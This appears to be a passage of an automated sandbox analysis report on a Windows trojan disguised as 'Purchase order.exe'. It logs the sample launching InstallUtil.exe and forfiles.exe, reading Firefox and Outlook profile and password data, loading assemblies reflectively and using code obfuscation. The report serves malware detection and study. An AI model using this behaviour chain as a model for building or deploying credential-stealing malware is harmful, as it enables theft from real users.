Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0468FA49 5_2_0468FA49
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04687A46 5_2_04687A46
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0467DAC6 5_2_0467DAC6
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04615AA0 5_2_04615AA0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04671AA3 5_2_04671AA3
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0468FB76 5_2_0468FB76
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04645BF0 5_2_04645BF0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0460DBF9 5_2_0460DBF9
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_045EFB80 5_2_045EFB80
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_00611B00 5_2_00611B00
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0060C9D0 5_2_0060C9D0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0060CBF0 5_2_0060CBF0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0060ABD0 5_2_0060ABD0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0060AD69 5_2_0060AD69
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0060AD20 5_2_0060AD20
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0060AD15 5_2_0060AD15
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_006151B0 5_2_006151B0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_006133AB 5_2_006133AB
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_006133B0 5_2_006133B0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0062B8B0 5_2_0062B8B0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0442E51B 5_2_0442E51B
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_044245AE 5_2_044245AE
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0442E6AD 5_2_0442E6AD
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0442E752 5_2_0442E752
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0442E3B8 5_2_0442E3B8
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0442D818 5_2_0442D818
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\forfiles.exe Code function: String function: 04605130 appears 58 times
Source: C:\Windows\SysWOW64\forfiles.exe Code function: String function: 0464F290 appears 105 times
Source: C:\Windows\SysWOW64\forfiles.exe Code function: String function: 04617E54 appears 110 times
Source: C:\Windows\SysWOW64\forfiles.exe Code function: String function: 045BB970 appears 250 times
Source: C:\Windows\SysWOW64\forfiles.exe Code function: String function: 0463EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: String function: 0178B970 appears 250 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: String function: 017E7E54 appears 110 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: String function: 0181F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: String function: 017D5130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: String function: 0180EA12 appears 86 times
Sample file is different than original file name gathered from version info
Source: Purchase order.exe Binary or memory string: OriginalFilename vs Purchase order.exe
Source: Purchase order.exe, 00000000.00000002.1391092460.0000000004481000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Purchase order.exe
Source: Purchase order.exe, 00000000.00000002.1375904708.0000000003481000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Purchase order.exe
Source: Purchase order.exe, 00000000.00000002.1391092460.00000000045B7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Purchase order.exe
Source: Purchase order.exe, 00000000.00000002.1395912851.00000000067D8000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Purchase order.exe
Source: Purchase order.exe, 00000000.00000002.1374372337.00000000017EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Purchase order.exe
Source: Purchase order.exe, 00000000.00000002.1393328780.0000000006220000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNpbwdyu.dll" vs Purchase order.exe
Source: Purchase order.exe, 00000000.00000002.1394905071.00000000065A0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Purchase order.exe
Source: Purchase order.exe, 00000000.00000002.1391092460.00000000044D5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Purchase order.exe
Uses 32bit PE files
Source: Purchase order.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Purchase order.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Purchase order.exe.45b7190.1.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.Purchase order.exe.45b7190.1.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.Purchase order.exe.45b7190.1.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.Purchase order.exe.45b7190.1.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 0.2.Purchase order.exe.4485570.0.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.Purchase order.exe.4485570.0.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.Purchase order.exe.4485570.0.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Purchase order.exe.4485570.0.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Purchase order.exe.45b7190.1.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.Purchase order.exe.45b7190.1.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Purchase order.exe.4485570.0.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.Purchase order.exe.4485570.0.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Purchase order.exe.4485570.0.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.Purchase order.exe.4485570.0.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Purchase order.exe.45b7190.1.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Purchase order.exe.45b7190.1.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Purchase order.exe.45b7190.1.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Purchase order.exe.45b7190.1.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/1@3/2
Source: C:\Users\user\Desktop\Purchase order.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\forfiles.exe File created: C:\Users\user\AppData\Local\Temp\3X4eGJ0_ Jump to behavior
Source: Purchase order.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Purchase order.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: forfiles.exe, 00000005.00000003.2106577449.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000005.00000002.2616112369.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000005.00000002.2616112369.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000005.00000003.2106577449.00000000009FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Purchase order.exe Virustotal: Detection: 42%
Source: Purchase order.exe ReversingLabs: Detection: 72%
Source: unknown Process created: C:\Users\user\Desktop\Purchase order.exe "C:\Users\user\Desktop\Purchase order.exe"
Source: C:\Users\user\Desktop\Purchase order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\SysWOW64\forfiles.exe"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Purchase order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\SysWOW64\forfiles.exe" Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Purchase order.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Purchase order.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Purchase order.exe Static file information: File size 1454080 > 1048576
Source: Purchase order.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x159e00
Source: Purchase order.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: forfiles.pdb source: InstallUtil.exe, 00000002.00000002.1906166179.0000000001228000.00000004.00000020.00020000.00000000.sdmp, iveUJ72crs3yyPj.exe, 00000004.00000002.2616590138.000000000162E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: forfiles.pdbGCTL source: InstallUtil.exe, 00000002.00000002.1906166179.0000000001228000.00000004.00000020.00020000.00000000.sdmp, iveUJ72crs3yyPj.exe, 00000004.00000002.2616590138.000000000162E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Purchase order.exe, 00000000.00000002.1391092460.0000000004481000.00000004.00000800.00020000.00000000.sdmp, Purchase order.exe, 00000000.00000002.1391092460.00000000045B7000.00000004.00000800.00020000.00000000.sdmp, Purchase order.exe, 00000000.00000002.1395912851.00000000067D8000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: InstallUtil.exe, 00000002.00000002.1906353643.0000000001760000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, 00000005.00000003.1915419405.00000000043DD000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000005.00000002.2617586828.000000000472E000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, 00000005.00000003.1906511372.0000000004223000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000005.00000002.2617586828.0000000004590000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Purchase order.exe, 00000000.00000002.1391092460.0000000004481000.00000004.00000800.00020000.00000000.sdmp, Purchase order.exe, 00000000.00000002.1391092460.00000000045B7000.00000004.00000800.00020000.00000000.sdmp, Purchase order.exe, 00000000.00000002.1395912851.00000000067D8000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: InstallUtil.exe, InstallUtil.exe, 00000002.00000002.1906353643.0000000001760000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, forfiles.exe, 00000005.00000003.1915419405.00000000043DD000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000005.00000002.2617586828.000000000472E000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, 00000005.00000003.1906511372.0000000004223000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000005.00000002.2617586828.0000000004590000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: forfiles.exe, 00000005.00000002.2618298895.0000000004BBC000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 00000005.00000002.2616112369.0000000000985000.00000004.00000020.00020000.00000000.sdmp, iveUJ72crs3yyPj.exe, 00000008.00000002.2618028068.0000000002ACC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2212834626.000000000271C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: Purchase order.exe, 00000000.00000002.1394905071.00000000065A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: Purchase order.exe, 00000000.00000002.1394905071.00000000065A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: InstallUtil.pdb source: forfiles.exe, 00000005.00000002.2618298895.0000000004BBC000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 00000005.00000002.2616112369.0000000000985000.00000004.00000020.00020000.00000000.sdmp, iveUJ72crs3yyPj.exe, 00000008.00000002.2618028068.0000000002ACC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2212834626.000000000271C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iveUJ72crs3yyPj.exe, 00000004.00000000.1827388972.000000000089F000.00000002.00000001.01000000.00000007.sdmp, iveUJ72crs3yyPj.exe, 00000008.00000002.2616482669.000000000089F000.00000002.00000001.01000000.00000007.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: Purchase order.exe, HostType.cs .Net Code: InnerInvokeMember
Source: Purchase order.exe, Crzguf.cs .Net Code: Xkblh System.Reflection.Assembly.Load(byte[])
Source: 0.2.Purchase order.exe.45b7190.1.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.Purchase order.exe.45b7190.1.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.Purchase order.exe.45b7190.1.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 0.2.Purchase order.exe.65a0000.7.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.Purchase order.exe.65a0000.7.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.Purchase order.exe.65a0000.7.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.Purchase order.exe.65a0000.7.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.Purchase order.exe.65a0000.7.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 0.2.Purchase order.exe.4485570.0.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.Purchase order.exe.4485570.0.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.Purchase order.exe.4485570.0.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Yara detected Costura Assembly Loader
Source: Yara match File source: 0.2.Purchase order.exe.6500000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Purchase order.exe.6500000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1375904708.0000000003481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1394610501.0000000006500000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Purchase order.exe PID: 2088, type: MEMORYSTR
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06385E51 push eax; ret 0_2_06385E69
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063ED43D push es; ret 0_2_063ED440
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063E4C31 push es; iretd 0_2_063E4C40
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063ED476 push es; retf 0_2_063ED47C
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063E1D55 push es; ret 0_2_063E1E1C
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063E1DE5 push es; ret 0_2_063E1E1C
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063E1DCE push es; ret 0_2_063E1DE4
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063ED275 push es; retf 0_2_063ED304
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063ED306 push es; retf 0_2_063ED304
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_063E39D5 push es; ret 0_2_063E3B88
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06416750 push es; ret 0_2_06416800
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06452B4D push es; retf 0_2_06452BA4
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06452B4D push es; retf 0_2_06452BD0
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06452B99 push es; retf 0_2_06452BA4
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06452BA5 push es; retf 0_2_06452BD0
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06459C61 push ebx; iretd 0_2_06459C67
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_0660F45D push es; retf 0_2_0660F46C
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06651768 pushfd ; iretd 0_2_06651769
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06843DA3 pushad ; ret 0_2_06843DAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_004019CE push esp; retf 2_2_004019CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0040A9F6 push ecx; ret 2_2_0040AA04
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0040D1F7 push edi; retf 2_2_0040D1F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_00417261 push 0000007Eh; retf 2_2_00417267
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_00407211 push esi; ret 2_2_00407213
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0040D2D8 push esp; ret 2_2_0040D2E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_00403330 push eax; ret 2_2_00403332
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_00418C56 pushfd ; retf 2_2_00418C5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0040855B push eax; retf 2_2_0040857C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0040751E pushfd ; iretd 2_2_00407524
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0040853E push eax; retf 2_2_0040857C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_00407606 pushad ; ret 2_2_00407607
Source: Purchase order.exe Static PE information: section name: .text entropy: 7.956446917851964
Source: 0.2.Purchase order.exe.6220000.4.raw.unpack, nbsRVtjEEQCGLF1IMmD.cs High entropy of concatenated method names: 'ug1jheoF6R', 'NINjxdq22W', 'rfLjNDA9Eq', 'UI9jOrJ3MW', 'OBnjtJdpge', 'xQAjQn2dny', 'rtSjA2WGW3', 'i7Xjs34NmS', 'JFIjI3Tsun', 'YkRjXxlvcc'
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
